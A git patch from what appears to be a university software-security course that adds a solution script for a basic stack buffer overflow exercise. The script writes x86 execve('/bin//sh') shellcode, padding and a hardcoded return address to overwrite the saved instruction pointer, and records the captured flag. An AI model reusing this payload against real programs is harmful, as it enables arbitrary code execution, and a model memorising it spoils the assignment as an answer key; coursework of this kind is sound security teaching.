From 185ca930bc1c2a4ecf79d507cb846bb6904f9370 Mon Sep 17 00:00:00 2001
From: Sascha Tommasone <sascha@tommasone.me>
Date: Fri, 14 Jun 2024 15:52:09 +0200
Subject: [PATCH] [Assignment-6] solution task 6 (basic buffer overflow attack)

---
 .../basic_overflow/solution.sh                     | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100755 Assignment 6 - Software Security - Teil 2/basic_overflow/solution.sh

diff --git a/Assignment 6 - Software Security - Teil 2/basic_overflow/solution.sh b/Assignment 6 - Software Security - Teil 2/basic_overflow/solution.sh
new file mode 100755
index 0000000..6c47ae7
--- /dev/null
+++ b/Assignment 6 - Software Security - Teil 2/basic_overflow/solution.sh	
@@ -0,0 +1,14 @@
+#!/bin/bash
+
+# flag{THAT_WAS_EASY_HUH}
+
+######### Exploit #########
+# Step 1: Write the provided shellcode to stdout
+printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
+
+# Step 2: Fill the buffer with 'A's until the stored EIP is reached
+printf "A%.0s" {1..91}
+
+# Step 3: Overwrite the stored EIP with the address of the shellcode
+printf "\x2c\xd5\xff\xff"
+###########################